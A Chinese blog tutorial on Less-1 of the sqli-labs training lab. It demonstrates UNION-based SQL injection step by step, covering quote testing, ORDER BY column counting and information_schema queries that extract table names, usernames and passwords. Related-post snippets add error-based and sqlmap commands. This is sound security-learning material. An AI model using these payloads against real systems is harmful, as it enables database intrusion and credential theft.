sqli-Less1

最新推荐文章于 2024-05-03 16:47:55 发布
最新推荐文章于 2024-05-03 16:47:55 发布
阅读量503 收藏 3
点赞数
分类专栏: # sqli专练 文章标签: sql mysql 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44060093/article/details/105619909
版权

最近准备拾起sql注入,sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通
正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。
我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的
首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句
在这里插入图片描述
首先发现id=1,可以查数据
再输入一个’
在这里插入图片描述
可能有注入
构造?id=1’ and ‘1’ = ‘1 ?id=1’ and ‘1’=‘2 发现1=2报错
在这里插入图片描述
证明有SQL注入
我们用order by 判断有几个字段
/?id=1’ order by 4–+发现保存
order by 3不报错,证明有三个字段
我们判断回显点
?id=-1’ union select 1,2,3 --+
前面id=-1的意思是让前一个查询数据出粗,后面你是用联合查询查询的结果就会在原来的位置上回显
在这里插入图片描述
可以看到回显点是2,3,
我们可以2,3回显的位置构造sql查询语句查询我们想要的东西
如查询一下当前数据库的名字
利用函数databasee()查询当前数据库的名字
在这里插入图片描述
函数version()查询当前数据库的版本
当前数据库的版本为5.5.53

在这里插入图片描述
首先我们知道一下information_schema数据库:它提供了访问数据库元数据的方式。其中保存着关于MySQL服务器所维护的所有其他数据库的信息,如数据库名,数据库的表名等
查库
select schema_name from information_schema.schemata
在这里插入图片描述
这里提示返回的数据超过了一行
这里我们使用一个函数,group_concat(),作用:连接一个组的所有字符,并以逗号分隔每一条数据
我们构造语句select group_concat(schema_name) from information_schema.schemata
在这里插入图片描述
因为之前用database()函数查到当前数据库为security数据库,所以我用此数据库查询表名
select group_concat(table_name) from information_schema.tables where table_schema=‘security’
在这里插入图片描述
一般users表中存储着用户名跟密码,我们查询users库中的列
select group_concat(column_name) from information_schema.columns where table_name=‘users’
在这里插入图片描述
我们需要username跟password字段
select 列名 from 库名.表名
在这里插入图片描述
还可以用~分隔
在这里插入图片描述

K—C
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1504
Sqli-labs靶场详细攻略
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 553
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 414
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
SQL注入less-1
m0_62903168的博客
05-03 887
注:phpstudy默认的php版本为7.x,想要成功的搭建靶场,需要把php版本改为5.x。
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 713
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
Sqli-Labs之less-1
ISNS的博客
02-03 1771
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入...
sqli-labs PoC 脚本.rar
08-09
课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料...
sqli less-01
ANYOUZHEN的博客
04-29 1306
我们试着输入id=1,查看是否有回显 接着输入id=1',发现出现报错 构造payload查询列表,?id=1' order by 3--+ 当我们输入?id=1' order by 4--+时出现了unknown,说明列表为3 接下来我们使用联合查询,?id=-1' union select 1,2,3--+; 然后发现2,3列有回应,说明可以爆破出数据库,列,用户和密码 接下来我们查询数据库,http://127.0.0.1/sqli/Less-1/?id=-1' union
sqli-labs中less-1~4实验详解
mr_secretT的博客
05-26 637
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的数据。这里我们使用的id参数为0,是因为我们需要id参数不存在于数据库的序列号当中,也可以使用负数.通过上述回显,我们可以判定,回显位为第2\3列。4.根据结果我们可以判定这是一个字符型注入漏洞,我们可以得到页面回显。2.从页面回显可以看出,3列数据中,只有2列可以页面回显,我们需要确认一下到底是哪两列会回显呢?我们可以构造语句获取每个。
sqli-labs (less1-less4)
Xi4or0uji
07-24 1714
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
Sqli-labs Less-1 报错注入
04-14 389
Sqli-labs Less-1 报错注入 1、首先打开less1后是一个页面,提示输入id作为参数。输入id=1试一下。 然后会出现,name 和 password,添加一个单引号 ' 测试一下注入点。 输入单引号发现,会直接将报错结果显示在页面中这里就可以尝试报错注入,将用户、数据库名称都爆破出来。 这里我们使用updatexml函数获取user()值。下图可以看到报错注入确实有效,我们看到用户为root,接下来爆数据库的名字。 0x7e是 '~' 的ASCII编码。 /sq.
sqlmap sqli less-1
记录笔记
04-11 592
python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -dbs python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -D security -tablespython python sqlmap.py -u “http://192.168.1..
sqli-lab刷题Less-1
MichealCurry1的博客
10-05 187
sqli1-lib刷题Less-1 本人是一名小白,刚开始进行web学习。 打开sqli-lib的Less-1,观察其页面。 可以看到,其页面提示输入id值,在url输入?id=1,提交id=1的参数,并且结合其给的提示,探测出其为单引号型的sql注入 之后拼接sql语句,在url输入?id=1’ order by 4 --+,order by会对列名称进行排序,多次试验发现为4时候报错,3不报错,证明该表名有3个字段 之后使用联合查询...
sqli-labs Less-1~4(sqli-labs闯关指南 1—4)
m0_54899775的博客
12-14 1185
sqli-labs Less-1 sqli-labs Less-2 sqli-labs Less-3 sqli-labs Less-4 sqli-labs Less-1~4(sqli-labs闯关指南 1—4) sqlilab注入天书1-4 sql注入
sqli-labs教程——Less 1-10
Lilin's博客
12-10 639
sqli-labs教程——Less 1-10 Page-1 Basic ChallengesLess-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)1. 判断是否有注入点2. 判断闭合字符3. 判断当前页面中sql语句的查询列数4. 判断数据在页面中的回显位置和sql语句中回显位5. 判断当前页面连接的数据库名称6. 判断security数据库中的表名称信息7. 判断users表的列名称信息8. 查询users表的所有信息Less
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值